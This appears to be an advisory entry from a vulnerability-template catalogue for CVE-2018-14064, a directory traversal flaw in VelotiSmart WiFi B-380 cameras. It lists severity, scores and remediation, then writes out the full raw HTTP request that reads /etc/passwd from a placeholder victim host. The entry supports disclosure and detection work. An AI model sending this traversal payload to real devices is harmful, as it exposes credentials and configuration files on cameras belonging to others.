| Title | VelotiSmart Wifi - Directory Traversal |
|---|---|
| Author | 0x_Akoko |
| Severity | Critical |
| Impact | Unauthenticated attackers can read arbitrary files on the VelotiSmart WiFi B-380 camera device through directory traversal, potentially exposing sensitive configuration files, stored credentials, and system information. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in VelotiSmart Wifi. |
| CVSS Score | 9.8 |
| EPSS Score | 0.7971 |
| CVE ID | CVE-2018-14064 |
| CWE ID | CWE-22 |
| Tags | cve2018 cve edb lfi camera iot velotismart_project vuln |
VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80.
GET /../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-14064.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-14064.pcap
N/AN/A